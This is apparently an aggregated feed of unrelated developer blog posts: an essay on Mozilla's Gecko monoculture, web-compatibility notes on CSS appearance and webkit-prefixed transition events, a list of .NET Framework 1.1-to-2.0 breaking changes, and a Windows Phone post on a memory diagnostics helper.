By turning our back on our Hackerbase, we have lost many things. In the first place, we have lost smart people, who may have contributed ideas or code or just dynamism. In the second place, we have lost plenty of opportunities for our code and our APIs to be tested for safety, security, or just good design. That’s already pretty bad.
Just as importantly, we have lost opportunities to be part of important projects. Chris Lord has more to say on this topic, so I’ll invite you to read his post if you are interested.
Also, somewhere along the way, we have largely lost any good reason to provide clean and robust APIs, to separate concerns between our libraries. I would argue that the effects of this can be witnessed in our current codebase. Perhaps not in the web-facing APIs, that are still challenged by their (mis)usage in terms of convenience, safety and robustness, but in all our internal+addons APIs, many of which are sadly under-documented, under-tested, and designed to break in new and exciting ways whenever they are confronted with unexpected inputs. One could argue that the picture I am painting is too bleak, and that some of our fragile APIs are, in fact, due to backwards compatibility with add-ons or, at some point, third-party applications.
Regardless, by the criteria of our Hackerbase, I would count the Gecko monoculture as a bloody waste.
So the monoculture has succeeded at making us faster, has somewhat helped propagate Web Applications, and has hurt us by severing our hackerbase.
Before starting to write this blogpost, I felt that turning Gecko into a Firefox monoculture was a mistake. Now, I realize that this was probably a necessary phase. The Gecko from 2006 was impossible to fix, impossible to refactor, impossible to improve. The Firefox from 2006 would have needed a nearly-full reimplementation to support e10s or Rust-based code (ok, I’m excluding Rust-over-XPConnect, which would be a complete waste). Today’s Gecko is much fitter to fight against WebKit and Chromium. I believe that tomorrow’s Gecko – not Firefox, just Gecko – with full support for WebExtensions and progressive addition of new, experimental WebExtensions, would be a much better technological base for implementing, say, a cross-platform e-mail client, or an e-Book reader, or even a novel browser.
As all phases, though, this monoculture needs to end sooner or later, and I certainly hope that it ends soon, because we keep paying the cost of this transformation through our community.
It is my belief that we now need to consider an exit strategy from the Gecko monoculture. No matter which strategy is picked, it will have a cost. But I believe that the potential benefits in terms of community and innovation will outweigh these costs.
First, we need to avoid repeating past mistakes. While WebExtensions may not cover all the use cases for which we need an extension API for Gecko, they promise a set of clean and high-level APIs, and this is a good base. We need to make sure that whatever we offer as part of WebExtensions or in addition to them remains a set high-level, well-insulated APIs, rather than the panic-inducing entanglement that is our set of internal APIs.
Second, we need to be able to extend our set of extension APIs in directions we not planned by any single governing body, including Mozilla. When WebExtensions were first announced, the developers in charge of the project introduced a uservoice survey to determine the features that the community expected. This was a good start, but this will not be sufficient in the long run. Around that time, Giorgio Maone drafted an API for developing and testing experimental WebExtensions features. This was also a good start, because experimenting is critical for innovation. Now, we need a bridge to progressively turn experimental extension APIs into core APIs. For this purpose, I believe that the best mechanism is a RFC forum and a RFC process for WebExtensions, inspired from the success of RFCs in the Rust (or Python) community.
Finally, we need a technological brick to get applications other than Firefox to run Gecko. We have experience doing this, from XULRunner to Prism. A few years ago, Mike De Boer introduced “Chromeless 2”, which was roughly in the Gecko world what Electron is nowadays in the Chromium world. Clearly, this project was misunderstood by the Mozilla community – I know that it was misunderstood by me, and that it took Electron to make me realize that Mike was on the right track. This project was stopped, but it could be resumed or rebooted. To make it easier for the community, using the same API as Electron, would be a possibility.
Similarly, I believe that we need to consider strategies that will let us avoid similar monocultures in our other projects. This includes (and is not limited to) B2G OS (formerly known as Firefox OS), Rust, Servo and Connected Devices.
So far, Rust has proved very open to innovation. For one thing, Rust has its RFC process and it works very well. Additionally, while Rust was originally designed for Servo, it has already escaped this orbit and the temptation of a Servo monoculture. Rust is now used for cryptocurrencies, operating systems, web servers, connected devices… So far, so good.
Similarly, Servo has proved quite open, albeit in very different directions. For one thing, Servo is developed separately from any web browser that may embed it, whether Servo Shell or Browser.html. Also, Servo is itself based on dozens of libraries developed, tested and released individually, by community members. Similarly, many of the developments undertaken for Servo are released themselves as independent libraries that can independently be maintained or integrated in yet other projects… I have hopes that Servo, or at least large subsets, will eventually find its way into projects unrelated to Mozilla, possibly unrelated to web browsers. My only reservation is that I have not checked how much effort the Servo team has made into checking that the private APIs of Servo remain private. If this is the case, so far, so good.
The case of Firefox OS/B2G OS is quite different. B2G OS was designed from scratch as a Gecko application and was entirely dependent on Gecko and some non-standard extensions. Since the announcement that Firefox OS would be retired – and hopefully continue to live as B2G OS – it has been clear that B2G-specific Gecko support would be progressively phased out. The B2G OS community is currently actively reworking the OS to make sure that it can live in a much more standard environment. Similarly, the Marketplace, which was introduced largely to appease carriers, will disappear, leaving B2G OS to live as a web OS, as it was initially designed. While the existence of the project is at risk, I believe that these two changes, together, have the potential to also set it free from a Gecko + Marketplace + Telephone monoculture. If B2G is still alive in one or two years, it may have become a cross-platform, cross-rendering engine operating system designed for a set of devices that may be entirely different from the Firefox Phones. So, I’m somewhat optimistic.
As for Connected Devices, well, these projects are too young to be able to judge. It is our responsibility to make sure that we do not paint ourselves into monocultural corners.
edit Added a link to Chris Lord’s post on the topic of missed opportunities.
The ponpare Web site for mobile devices has a good rendering in Blink and WebKit browsers.
But when it comes to Firefox on Android. Ooops!
I'll pass on the white background which is another issue, and will focus exclusively on the double arrow for the button which is very cool when you want to kill two birds at the same time, but less so for users. What is happening?
Exploring with the Firefox Devtools, we can find the piece of CSS in charge of styling the
select element.
#areaNavi select { padding-right: 10px; margin-right: 0; -webkit-appearance: button; -moz-appearance: button; appearance: button; height: 32px; line-height: 32px; text-indent: 0px; border: 0px; background: url("/iphone/img/icon_sort.png") no-repeat scroll 100% 50% transparent !important; background-size: 7px 9px !important; width: 80px !important; color: #FFF; font-weight: bold; font-size: 11px; }
Everything seems fine at first sight. The developers have put two vendor prefixes (
-webkit- and
-moz-… no
-ms- ?) and the "standard" property.
appearance?
OK. Let's see a bit. Let's take this very simple code:
<select> <option value="0">First option</option> </select>
On MacOSX these are the default rendering for the different browsers :
-moz-appearance: menulist;
-webkit-appearance: menulist;
-webkit-appearance: menulist;
Let's add a styling with an
appearance: button and reloads
<style>select {appearance: button;}</style> <select> <option value="0">First option</option> </select>
It doesn't change anything because no browsers have implemented it. Firefox sends in the console a
Unknown property 'appearance'. Declaration dropped. Let's check if there is a specification. The CSS4 draft about appearance defines only two values:
auto and
none. So it's quite normal a standard property doesn't send back anything.
appearance?
We modify our simple piece of HTML code
<style>select { -moz-appearance: button; -webkit-appearance: button; appearance: button; /*as of today non standard*/ }</style> <select> <option value="0">First option</option> </select>
We start to see interesting things happening.
But let's say that the zoom feature is really a detail… of implementations.
The designer made the select list a button… how does the designer now says to the world: "Hey in fact, I know, I know, I made it a button but what I meant was a menu item list".
background-colorfor
selectand its magical effect
Plain buttons are boring. The very logical thing to do is to add a
background-color… We modify again our HTML code.
<style>select { -moz-appearance: button; -webkit-appearance: button; appearance: button; background-color: #e8a907; }</style> <select> <option value="0">First option</option> </select>
And we get… drums!
-moz-appearance: listitem;?
At least Blink and WebKit just take a background-color.
So the usual answer from the Web designer who was not satisfied with the default rendering of
select and made it a button… is to add an image in the background of the button to say: "yeah yeah I know this is in fact a drop-down menu".
<style> select { -moz-appearance: button; -webkit-appearance: button; appearance: button; background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA8AAAATCAYAAABPwleqAAAA+0lEQVQ4jZ3OIUvEcByH8edEg5gEk4fVYD3lwKxvwGZYsNpkzWK17KrJNVnyFRhcHOLKYKBhRWRlIgPHymRfyw7GsZv73wPf9OMDP4ApcGq4KU3jFfDuHK/lef4m814ACMPwegV8AYBt2ztVVf0YwG9Jm/PXSZLkwQDPaOd53rGkegCsJe2z0CjLstcB+GkRAhAEweUAfNaJLcvaKsvyqwd+SlrvxABxHN/14JulEMB13YO6rn87YCVp3IsB0jR97sCP/0IA3/fPO/DJIDyZTDaKovhowXdJo0EYIIqi2xa+GgwBHMfZk1Q22zbCAJLuJbnGsMGHko6W3f8AtvoZYaFYm9gAAAAASUVORK5CYII=) no-repeat scroll 100% 50% #e8a907; background-size: 7px 9px; width: 150px; height: 30px;} </style> <select> <option value="0">First option</option> </select>
We finally get this:
Now, if your goal was to have the white arrow down in Firefox, you would need to do:
-moz-appearance: none;
At the beginning I thought there was something crazy going on with WebKit based browsers, but there might be a gecko bug too. I added comment on a webcompat issue anyway. We need to dig a bit more into this.
Otsukare!
Here's a twist on the classic "browser has bug, developers change to work around it, sites depend on it, browser has to implement weird workaround to fix their bug without breaking those sites, and then other browsers need to match weird workaround bug compatibility" cycle.
In this case, Bug 1236930 reported that zooming in on Strava maps only worked once. Strava (and a ton of other popular sites) uses a slick little mapping libary called Leaflet.js, and if our work to ship WebKit-prefixed CSS and DOM aliases (check out Bug 1170774) is actually going to uh, ship, we obviously can't break it.
You can read the whole bug later; here's the problem distilled to two lines of JS (see if you can find it):
o.DomUtil.TRANSFORM=o.DomUtil.testProp( ["transform","WebkitTransform", "OTransform","MozTransform","msTransform"]), o.DomUtil.TRANSITION=o.DomUtil.testProp( ["webkitTransition","transition", "OTransition","MozTransition","msTransition"])
You see how they're trying to do the nice thing and test for the right transition and transform properties to use?
Once they know that, they construct the
TRANSITION_END string to attach listeners with elsewhere in the code.
o.DomUtil.TRANSITION_END="webkitTransition"===o.DomUtil.TRANSITION||"OTransition"===o.DomUtil.TRANSITION?o.DomUtil.TRANSITION+"End":"transitionend",
Did you notice how
o.DomUtil.TRANSITION is actually testing for
webkitTransition before the prefixless
transition? (I actually missed that my first time staring at this code, classic rookie move).
Once upon a time, Leaflet.js did the logical thing and tested for prefixless
transition first, but in this sweet bugfix commit, that changed.
You can click through to get references to the bug it fixed, but here's a comment in the patch that gives you a gist of why they did this:
// webkitTransition comes first because some browser versions that drop vendor prefix don't do // the same for the transitionend event, in particular the Android 4.1 stock browser
So at some point in time*, some stock Android browser versions supported prefixless CSS transitions, but forgot to unprefix the
transitionend event. And websites broke, and libraries updated to workaround them.
So we added support to sometimes send
webkit prefixed
transitionend events (and
animationend,
animationiteration and
animationstart) to Gecko in bug 1236979, matching WebKit, Blink, and Edge's behavior.
If you want more details on when to send those events, check out the bug. Or for extra credit, read the DOM spec. We updated that too.
(* Wikipedia says Jelly Bean was released in June 2012, which was when Gotye's 'Somebody That I Used to Know' Feat. Kimbra was the #1 song so I guess we all sort of deserve this mess, honestly.) | http://www.w3.org/html/planet/atom.xml | CC-MAIN-2016-18 | refinedweb | 9,564 | 61.26 |
C:\Panda3D-1.0.3\samples\Basic-Tutorials–Lesson-1-Scene-Graph>C:\Python23\LIB\o
s.py:282: Warning: ‘yield’ will become a reserved keyword in the future
‘import site’ failed; use -v for traceback
C:\Python23\LIB\os.py:282: Warning: ‘yield’ will become a reserved keyword in th
e future
Traceback (most recent call last):
File “Tut-Step-5-Complete-Solar-System.py”, line 12, in ?
import direct.directbase.DirectStart
File “C:\Panda3D-1.0.3\direct_init_.py”, line 2, in ?
import os,sys
File “C:\Python23\LIB\os.py”, line 282
yield top, dirs, nondirs
^
SyntaxError: invalid syntax
does not work “out of box”
i’m sure this is just a configuration problem, but i have no experience w/ python. this project has inspired me to learn it… that is… once i get it running. | https://discourse.panda3d.org/t/not-working-out-of-box-syntax-error/324 | CC-MAIN-2022-33 | refinedweb | 139 | 59.19 |
<<
apatriarcaMembers
Content count875
Joined
Last visited
Community Reputation2365 Excellent
About apatriarca
- RankAdvanced Member
Personal Information
- LocationTorino, Italy
apatriarca replied to ICanC's topic in For BeginnersThe easier way to define the type correctly is to first create a typedef for your function type and then define your function returning that type. getfunc can't set his own value in its implementation. And it can't be a function pointer if you are trying to implement it as a function getting a char and returning a function pointer. getfunc would also have a different type than add or sub.. typedef int (*op_func)(int, int); // .. define add and sub op_func getfunc(char op) { switch(op) { case '+': return add; case '-': return sub; } } int main() { fprintf("5 + 7 = %d", getfunc('+')(5, 7)); fprintf("5 - 7 = %d", getfunc('-')(5, 7)); }
apatriarca replied to Alexey Makarov's topic in Math and PhysicsNot really interpolation. That's a simple sum over the non-zero functions.
apatriarca replied to Alexey Makarov's topic in Math and PhysicsI can't open your link but the basic approach is to define your field as a sum of basis functions centered at the maximum and minimum points. Many different functions can be used. Some additional examples include rational functions like 1/(1 + x^2) or piece-wise polynomial or trigonometric functions like F(x) = cos(x) + 1 in [-pi, pi] and zero outside. What other properties do you want from your peaks? A cubic B-spline basis function is a piece-wise polynomial function which is used as the basis for B-spline curve and surfaces. It is defined recursively and they can be defined for any order/degree. The cubic B-spline basis functions are the more common ones. The local support property can be useful in this case since it means the function is zero outside some distance from these points (thus reducing the amount of computation required).
apatriarca replied to Alexey Makarov's topic in Math and PhysicsI am not sure what you mean by the field to be uniform. You can use any function with a peak in the point to create production or consumption. Different functions will obviously look different. A good candidate can probably be cubic B-spline basis functions. They are quite fast to evaluate and they have a local support. Their derivative is also very easy to compute (which makes it easier to compute the flow).
apatriarca commented on galapogos22's blog entry in Journal of GrufflerNothing I have read in this post can actually be considered PBR. You have in fact just took the intuitive meaning of all those concepts and mixed them. A physically based approach should instead start from the ways a particular material interact with light. The formulas and meaning of the various terms are actually completely wrong. The specular light is computed in an incorrect way and it does not behave like specular light at all. The metallic term is not shininess, but a parameter used to interpolate between two very different material responses. A metal is very specular (even at normal incidence), it has a colored specular reflection and there is no diffused light. A dielectric has instead a mostly diffused response at normal incidence (only about 4% is reflected) and the reflection is white. There is no patina (not sure what you mean here). There are probably also other things. While I agree implementing the concepts is the best way to learn, I think you should still try to read good resources on the subject and implement the concepts properly. If you just try to write things before really understanding them you risk to learn them wrong.
- In the shader you can do many different things to improve the details: 1. Increase the tessellation dynamically using the tessellation shader, 2. Use displacement mapping to give the impression of details without actually adding more geometry.
apatriarca commented on y2kiah's article in General and Gameplay ProgrammingThis sort of implementation is actually useful in a more general settings than game development. This is not however a complete alternative to std::unordered_map since the handles are generated by your handle_map and not by the user. Considering the ECS system for example, the handles of the components will be all different. You can't use a single ID to retrieve all the components of an entity from the various systems.
- A few observations: 1. Do you really need to compute the radius each time? Isn't it a known quantity? 2. Why are you converting every angle to degrees? That's useless and you then have to convert them back to radians (or other range) to be able to use them. 3. The normal of each vertex is the vertex itself normalized. You can thus simply multiply the vector by some value to get the displaced one. If the vector has lenght R and you want its height to be H, you simply have to multiply by H/R. 4. This is probably all best done in a shader. The base displacement can be done in a vertex shader and you can probably also use a tessellation shader to increase details when needed. Finally lighting can do a great work in adding details. 5. I still have to check the correctness of your formulas.
apatriarca replied to isbinil's topic in Math and PhysicsMy problem with volatile was its use inside the loop. In this case the compiler can't rely on the fact the variable has not changed between the various iterations and it has to load&store each time the variable is used. An alternative solution, I think, can be to write to a big array.
apatriarca replied to isbinil's topic in Math and PhysicsThe volatile keyword basically prevents any optimization in the loop. Moreover, each loop iteration depends on the previous one which means low pipeline usage in the CPUs and no chance for SIMD auto-vectorization. This isn't a particularly meaningful benchmark and I think it is not representative of the real performances of these functions. I would simply use sin or sinf. In most cases it should use the correct cpu instruction, eventually also using SIMD ones or treating them as constant expressions.
apatriarca replied to Zingam's topic in General and Gameplay ProgrammingWhat video player library you are using on the other platforms?
apatriarca replied to Jaay_'s topic in Hobby Project ClassifiedsWhy an artist should choose you instead of other people? You are mostly listing your skills, but there is no way to actually understand your level in each skill. Moreover, you are not showing any project you have done and you said you have problems completing your projects. If I were someone looking for a patner for making a project that skill would actually be quite important. Even projects you are not particularly proud of can be important to find someone.
apatriarca replied to Chiezy's topic in Math and PhysicsYou can subdivide the regions with axis aligned rectangles (it seems the section of your cuts are either vertical or horizontal) and quite easily compute the area of the regions by summing all the areas of the rectangles.
apatriarca replied to StanLee's topic in Math and PhysicsIf you do not understand the mathematics (and physics?) of indirect illumination, why are you trying to come up with a real-time algorithm for it? The first step to solve any problem (and thus also creating an algorithm for that) is indeed to understand it in depth. You should have at least looked for algorithms doing the same thing! I find your description very confusing. I am not sure I understand what you mean by "photon" in your algorithm. A photon is simply light, there is no direct or indirect contribution. It also look quite expensive since you probably need to render your scene for a lot of photons and (I guess) store these render buffers in several textures. You will then need to retrieve all these information in some way in the final pass.
apatriarca commented on DemonDar's article in General and Gameplay ProgrammingI personally find your two cons to be actually bigger problems than the pros. I never had much problems with public namespace pollution. I had problems with some code not compiling because I changed what was included in an header file, but if some code break because it relied on some implementation details then that code is buggy. I don't think it is a library fault. It is also a very easy problem to solve. Compile time is instead a very big problem in C++ for me. You should really try to reduce it or it will skyrocket when the project grow bigger. You also spend a lot more time maintaining the code than writing it. | https://www.gamedev.net/profile/105019-apatriarca/?tab=reputation&app_tab=forums&type=given&st=15 | CC-MAIN-2017-30 | refinedweb | 1,470 | 54.32 |
Marshal.WriteInt16(logFont, LogFontNameOffset, (short)'@');
In RTM, we had behavior on some of our IO classes which was simply inappropriate. One such case is DirectoryInfo.Parent. In RTM, if you called this API, and passed a path ending in a slash, then the path returned would simply give the same path, without the slash:
DirectoryInfo di = new DirectoryInfo(@"c:\temp\Dir\"); DirectoryInfo di2 = di.Parent();
In v1.0, the call to Parent would return "c:\temp\Dir" for the DirectoryInfo. However, this is not the way users expect this to behave: the backslash should simply have been ignored. We therefore changed this API to ignore a trailing backslash, so in v1.1, the above call will now return "c:\temp". As part of this change, DirectoryInfo.Name was changed. In v1.0, if a path which ended in a backslash, we would do no interpretation of the path at all, and simply return the fullname. In V1.1, we now determine that if you have specified 'c:\foo\bar', then the name simply refers to bar. This change in behavior is consistent with the change to Parent.
In the CLR model, we assert that arguments, locals, and return values (things which you can't tell their size) can be expanded at will. When you say float, it means anything greater than or equal to a float. So we can sometimes give you what you asked for 'or better'. When we do this, we can spill 'extra' data, almost like a 'you only asked for 15 precision points, but congratulations! We gave you 18!'. If someone expected the floating point precision to always remain the exactly the same, they could be affected. In order to faciliate performance improvements and better scenarios, the CLR may rewrite (as in this case) parts of the register. For example, things that used to truncate because of spilling, no longer do. We make these kinds of changes all the time. We believe this is an appropriate change, and it is even called out specifically in the CLI specification, as something which can, and will occur with different iterations:
Affected code will look something like the following:TypeSpec
#4 (1b000004) ------------------------------------------------------- TypeSpec : Class System.Byte
It should however, look like:
TypeSpec #4 (1b000004) ------------------------------------------------------- TypeSpec : ValueClass System.Byte
The CLR accepted this incorrect metadata in v1.1. We have tightened down and do not accept it in v2.0.
GetTypeFromCLSID() used to return a type object from tlbimp'ed assembly if there is a type with same GUID already loaded earlier. Such type used to yield 'false' when Type.IsComObject() is called. And, Type.GetMethodInfo() used to return whatever we could see in IL metadata assembly.
Now:
The reason we need to do this is to make things deterministic. In the V1 and V1.1 CLR, if the type has been loaded then we will wrap the created instance with the actual type, even if the Interop assembly for that type hasn't been registered. This can lead to unfortunate race conditions where, depending on what has currently been run in the AppDomain, the type will either be wrapped with an __ComObject or with the actual type. To remove these race conditions, we changed the behavior to only wrap the created COM object with the actual type if the Interop assembly is registered.
The problem with the V1 and V1.1 behavior is that depending on the app and the environment in which it is run (is it ngen'd, is it run off a network share, what are the security settings of the machine, etc), the CLR might need to start up COM to perform some of the startup code. When this happens, the CLR needs to start up COM before control enters the user's main and because we need to pick a default, we would CoInitialize it to MTA. What this would cause is that in some situations, your code below that does a CoInitialize in your Main method would fail. However under other circumstances it would pass. Changing the CLR to never use COM before the user's code is executed wasn't possible (it's not impossible, it is just way too much work and puts too many restrictions on the CLR to be viable) so we decided to make the behavior deterministic by always CoInitializing to MTA unless the [STAThreadAttribute] was specified on the main method.
Input from Christopher Brumme on this change:
"Whenever you set the apartment state of a running managed thread, you are in a race condition. That's because things like .cctors or security demands or assembly load notifications may have executed on that thread, perhaps causing marshaling of oleaut data—or any number of other things that could have caused a CoInitialize to happen. Even if the first line of your managed threadproc sets the apartment state, we have already executed an arbitrary amount of managed application code. And that arbitrary set of code changes whenever you upgrade the CLR, change the JIT inlining, fiddle with .cctor rules for NGEN vs. domain neutral, change security policy, etc.
If you are trying to set it to MTA, chances are you are okay. That's because we will default to MTA if we need to CoInitialize a thread. The only way someone would have set it to STA is if a .cctor or security infrastructure or hosting code had done this to you. And that would be pretty rude. Of course, if the CLR sets it to MTA and then the app sets it to MTA, this will be quietly accepted. So the only case that's likely to break is if the application selects STA but the CLR has already CoInitialized the running thread to MTA.
Anyway, the bottom line is that applications which set the apartment state of a running managed thread are perched on a knife edge. Long term, we need to move to a more stable and predictable world. The only question is the best way to do this. >We needed to change the behavior of 'main' on a managed EXE to be MTA if it is unspecified and we added a config setting for old C++ apps and for VB/C# apps that weren't built with Visual Studio.
The other change we added is for managed threads started with 't = new Thread(...); t.Start();'. If you didn't set the apartment state before you called Start, then it is now too late. We will have already placed you in the MTA. The same config setting to get the old behavior applies here too.
We realize that both of these changes will break apps. But those apps are going to break at some rate, as we disturb the race conditions anyway. We are providing the deterministic and reliable behavior now, know it will break some applications, rather than leaving in non-deterministic behavior that breaks applications with each new release."
For Unicode standard compliance, Encoding.GetBytes() will not emit bytes if there is an unpaired or out of order surrogate. This is most obvious if the caller call GetBytes() with one high or low surrogate. In this case, UTF8Encoding and UnicodeEncoding will not emit nothing.
The Unicode 4.0 requires that compliant applications not emit unpaired surrogates. In v1.1, GetBytes() will emit bytes for lone surrogates if the encoding supports it (such as UTF-8 and UnicodeEndcoding). However, this leads CLR not to be Standard compliance with Unicode 4.0.
The change can break application's assumption about that GetBytes() will emit leading high surrogates or mismatched surrogates. BinaryWriter.Write(char ch) is one example of being broken.
Although breaking, we would need to go head and fix this to provide more consistent behavior, justification:
// Assume the user's current calendar is JapaneseCalendar. CultureInfo ci = new CultureInfo("ja-JP"); // Create Japanese culture ci.DateTimeFormat.Calendar = new GregorianCalendar(); // Switch to Gregorian calendar Console.WriteLine(ci.DateTimeFormat.FullDateTimePattern; // The Japanese format is printed out, while Gregorian format is expected.
Cctor ordering for beforefieldinit types is not specified by ECMA. ECMA only specifies that the runtime will execute cctors on beforefieldinit types some time prior to any access to a type's static field. It does not offer any guarantees regarding exactly when and in which order these cctors should be executed.
Note: C# automatically marks types as beforefieldinit when static fields are initialized using "=" syntax like in "static int i = 5;". VB.NET programs are not affected since they use precise cctor semantics always.
In v1.0 and v1.1, some pathways through the loader recorded a failure to load an assembly and would fail subsequent attempts to load that same assembly into the same AppDomain. However, most pathways through the loader would not cache this binding failure. This lack of caching enables certain scenarios, which some customers are doubtless taking advantage of.
In v2.0, the default behavior is to break these scenarios. Naturally the .NET Framework supports an opt-in mechanism to force the loader back to the v1.0 & v2.0 behavior via a config file. These scenarios are broken by the following changes made in v2.0:
The v1.x binder was arbitrarily assigning binding preferences between two methods. For example, in v1.x if you swap the declared order of M0 (or M2) the binder will bind to the other method.
using System; using System.Reflection; class C { public void M0(object arg) { Console.WriteLine(2); } public void M0(ref int arg) { Console.WriteLine(1); } public void M1(ref object arg) { Console.WriteLine(2); } public void M1(ref int arg) { Console.WriteLine(1); } } class Repro { static void Main() { // Result depends on the order the M0 overloads were declared typeof(C).InvokeMember("M0", BindingFlags.Public | BindingFlags.Instance | BindingFlags.InvokeMethod, null, new C(), new object[] { 100 }, null); // Result depends on the order the M1 overloads were declared typeof(C).InvokeMember("M1", BindingFlags.Public | BindingFlags.Instance | BindingFlags.InvokeMethod, null, new C(), new object[] { 100 }, null); } }
Now, in v2.0, we throw an AmbiguousMatchException and inform the developer about the ambiguous match rather than leave in the arbitrary, and prone-to-change, behavior of previous releases.
#if VS2005B2 SafeHandle handle = infoField.GetValue(configKey) as SafeHandle; IntPtr keyHandle = handle.DangerousGetHandle(); #endif
Hashtable h = new Hashtable(); h.GetEnumerator(); (h as ICollection).GetEnumerator(); Hashtable h2 = Hashtable.Synchronized(h); h2.GetEnumerator(); (h2 as ICollection).GetEnumerator();
If you pass in an array with one or more null entries into the API WaitHandle.WaitAll, in V1.1 this would throw an ArgumentNullException. In V2.0 this will throw a FatalExcecutionException, which cannot be caught and will tear down the process.
This happens because of a coding error. There is code to detect this situation and throw an exception, but some code earlier in the routine puts the array in a special wrapper that dereferences all the entries in it, which causes an AV in the VM, which tears down the process because that is the policy for failures of this type.
Applications dependent on the implementation of private fields could be broken when the private field's type changes.
For instance, an app could use reflection to obtain a private field and try casting that field to an illegal type.
This has broken applications such as the Enterprise Library configuration tool, where the field type used to be safely cast to an IntPtr value, but since it has changed to a SafeHandle in v2.0 can no longer be cast this way.
The StackTrace dump in Environment and Exception had an error in V1.1 where it did not report nested type names correctly:
namespace A { public class B { public class C { public string f() { return new StackTrace().ToString(); } } } }
In V1.1 this reported "A.C.f()". In V2.0 the error was corrected to report "A.B.C.f()". Test code that baselines stack traces or code that cracked the text output of stack traces could have taken a dependency on the original bug.
Put a catch block at the top of your non-main thread, threadpool workitem, or finalizer. (Or else fix the bug that led to the exception.)
Alternatively, in the section of the application's config file, add the following:<legacyUnhandledExceptionPolicy enabled="1"/>
<legacyUnhandledExceptionPolicy enabled="1"/>
Class .ctor ordering for beforefieldinit types is not specified by ECMA. ECMA only specifies that runtimes will execute clas .ctors on beforefieldinit types some time prior to any access to a type's static field. It does not offer any guarantees regarding when exactly this might happen and in which order exactly. This of course never stopped anybody to (unknowingly) take a dependency on unspecified behavior if the behavior is consistent on the same runtime version.
Note: C# automatically marks types this way when static fields are initialized using "=" syntax like in "static int i = 5;". VB.NET programs are not affected since they use precise class .ctor semantics always.
An FxCop rule has been added to help detect the invalid pattern.
A thread can save the state of ReaderWriterLock into a LockCookie, and restore the state in the future using the saved LockCookie. A LockCookie can be serialized to a buffer. The buffer can be modified and then deserialized to a LockCookie. Now a thread can use the new LockCookie to restore the state of ReaderWriterLock. A LockCookie for one ReaderWriterLock can be used to restore a different ReaderWriterLock.
In addition, a LockCookie contains thread information about the thread to which a lock belongs. Serializing to a buffer, changing the thread id, and deserializing could open possible desynchronization attacks against arbitrarily chosen threads, provided that their identifiers were known or could be guessed
In 1.1 the three values in the enum System.Diagnostics.PerformanceCounterPermissionAccess were Browse:6, Instrument:2, Admin:14. These have been changed to browse:3, Instrument:1, Admin:7
Additionally, the value of System.AttributeTargets.All has changed from 16383, to 32767
IntPtr oldHandle = waitHandle.Handle; Win32.CloseHandle( oldHandle ); waitHandle.Handle = Win32.CreateEvent( );
From V1.1 to V2.0 the WaitHandle class has changed. It now points to a SafeWaitHandle, not to the raw handle.
Getting the handle and closing it is bad. The SafeWaitHandle still tracks the old handle and it will try to close it at finalize time. This means that the handle can be attempted to be closed twice.
The .NET Framework 1.1 C# compiler in certain cases generates code that calls virtual methods non-virtually. One of these cases is where there is a switch statement based on strings where the number of cases is greater than 8. In .NET Framework 2.0 a change was made to the verification rules for security purposes to disallow calling virtual methods non-virtually (in most cases). Therefore when code that was compiled using the .NET Framework 1.1 compiler is executed against .NET Framework 2.0, and the compiled MSIL binary contains a normal CALL (instead of a CALLVIRT) to a virtual method, and the assembly is running in partial trust, the MSIL needs to be verified, and it fails verification because of the new rule. The failure shows up as a System.Security.VerificationException.
The next broad release of the .NET Framework (2.0 SP1 or Orcas) has a workaround for this issue. The workaround is to modify the machine.config file for the machine where the application is running by replacing the default "<runtime />" with:
<runtime> <legacyVirtualMethodCallVerification enabled="1" /> </runtime> | http://msdn.microsoft.com/es-es/netframework/aa497241(en-us).aspx | crawl-002 | refinedweb | 2,569 | 57.47 |
0
I have been working on this array problem since last Friday. We are to accept an employee's gross sales, multiply that by 9%(to find commission) add $200 for weekly salary. Then the program takes that dollar amount and tallies payroll with ( *'s) beside salary groupings....
ex
$200-299 ****
$300-399 **
$400-499* ......ect
my problem is I can't get this to complie to even see how close I am. My compiler keeps giving this error...
\Sales.java:30: ')' expected
salary = (double 200 + (grossSales * .09 ));
^
java:30: ';' expected
java:30: ';' expected
salary = (double 200 + (grossSales * .09 ));
^
I'm lost and frustrated and need some advice......Here is what I have
/import java.util.Scanner; public class Sales { //counts number or salespersons in different salary ranges public void countRanges() { Scanner input = new Scanner( System.in ); double salary;//salespersons pay double grossSales;//sales to base commission of 9% on //ininialize the values in the array to zero salary = 0; grossSales = 0; //read in values and assign them to the appropriate ranges System.out.print( "Enter Gross Sales or enter a negative number to exit" ); dollars = input.next.Int(); grossSales = dollars; while ( dollars >= 0 ) { //calculate salary an get range by salary/100 salary = (double 200 + (grossSales * .09 )); range = ( salary/100 ); if ( range > 10 ) range = 10; //count totals for every range for ( int counter = 0; counter < array.length; counter++ ) total += array[ counter ]; if ( counter == 10 ) System.out.printf( "%5d: ", 1000 ); else System.out.printf( "%3d-%3d: ", counter * 100, counter * 100 + 9 ); //enter next sales amount (negative to end) System.out.print( "Enter next Gross Sales or enter a negative number to exit" ); grossSales = input.nextInt(); }//end while //print chart for ( int stars = 0; starts < array [counter]; star++ ) System.out.print( "*" ); }//end method countRanges }//end class Sales | https://www.daniweb.com/programming/software-development/threads/173349/simple-array-problem-not-so-simple | CC-MAIN-2017-47 | refinedweb | 295 | 67.35 |
Today Jeff Wilcox, David Anson, and I did a Channel 9 live session with Dan Fernandez at the PDC on Microsoft campus. You can catch it almost exactly 55 minutes into the stream here (note to self: try to remember what team you work on - it's the Application Platform team, not the Application Development team!)
One thing I mentioned was the LazyListBox, which you can find here, and the other ListBox virtualization samples that you can find on the Silverlight Performance blog here.
Anyway, I foolishly promised to publish something on my blog, so here it is. It's a simple class called MemoryDiagnosticsHelper that shows a counter similar to the built-in frame-rate counter that can be used to show how much memory you are using. It will also Assert if you go over the marketplace limit of 90MB, which is nice. It also ensures that the calls to DeviceExtendedProperties are only made in DEBUG mode so that you won't get a scary disclosure in marketplace for "identifying the device."
Anyway, the code is attached along with a very silly sample app. All you really need is the MemoryDiagnosticsHelper.cs file though, which you can pull into your existing apps and add a line like this in App.xaml.cs right under the call to EnableFrameRateCounter
MemoryDiagnosticsHelper.Start(TimeSpan.FromMilliseconds(500), true);
at 500 ms and do GC
MemoryDiagnostics.MemoryDiagnosticsHelper.Start(TimeSpan.FromMilliseconds(500), doGarbageCollectOnTimer);
the
return (long)DeviceExtendedProperties.GetValue("ApplicationCurrentMemoryUsage");
and the peak one fail with an out of range arg after 2.5 hours continuous running. I've since changed 500 to 2000, and for the heck of it not forcing GC. Time will tell if the 2.5 is related to the call interval, or the system itself.
